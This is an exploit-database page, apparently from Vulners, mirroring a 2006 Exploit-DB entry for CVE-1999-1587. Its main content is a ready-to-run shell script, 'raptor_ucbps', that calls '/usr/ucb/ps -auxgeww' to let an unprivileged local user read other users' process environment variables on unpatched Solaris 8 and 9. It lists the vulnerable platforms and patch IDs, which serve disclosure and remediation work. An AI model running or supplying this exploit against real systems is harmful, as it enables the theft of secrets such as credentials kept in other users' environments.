Lucene search
K

Solaris 8/9 ps - Environment Variable Information leak

🗓️ 26 Jul 2006 00:00:00Reported by Exploit-DBType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

Solaris /usr/ucb/ps Environment Variable Information Leak ex

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Solaris 8/9 ps - Environment Variable Information leak Exploit
8 Nov 201600:00
zdt
Circl
CVE-1999-1587
17 Sep 202421:34
circl
CVE
CVE-1999-1587
29 Mar 200601:00
cve
Cvelist
CVE-1999-1587
29 Mar 200601:00
cvelist
EUVD
EUVD-1999-1568
7 Oct 202500:30
euvd
NVD
CVE-1999-1587
31 Dec 199905:00
nvd
OpenVAS
Solaris Update for ps cmd 120239-01
3 Jun 200900:00
openvas
OpenVAS
Solaris Update for ps cmd 120240-01
3 Jun 200900:00
openvas
OpenVAS
Solaris Update for ps cmd 120239-01
3 Jun 200900:00
openvas
OpenVAS
Solaris Update for ps cmd 120240-01
3 Jun 200900:00
openvas
Rows per page
#!/bin/sh

#
# $Id: raptor_ucbps,v 1.1 2006/07/26 12:15:42 raptor Exp $
#
# raptor_ucbps - information leak with Solaris /usr/ucb/ps
# Copyright (c) 2006 Marco Ivaldi <[email protected]>
#
# A security vulnerability in the "/usr/ucb/ps" (see ps(1B)) command may allow 
# unprivileged local users the ability to see environment variables and their 
# values for processes which belong to other users (Sun Alert ID: 102215).
#
# Absolutely nothing fancy, but it may turn out to be useful;)
#
# Usage:
# $ chmod +x raptor_ucbps
# $ ./raptor_ucbps
# [...]
#
# Vulnerable platforms (SPARC):
# Solaris 8 without patch 109023-05 [tested]
# Solaris 9 without patch 120240-01 [tested]
#
# Vulnerable platforms (x86):
# Solaris 8 without patch 109024-05 [untested]
# Solaris 9 without patch 120239-01 [untested]
#

echo "raptor_ucbps - information leak with Solaris /usr/ucb/ps"
echo "Copyright (c) 2006 Marco Ivaldi <[email protected]>"
echo

/usr/ucb/ps -auxgeww

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation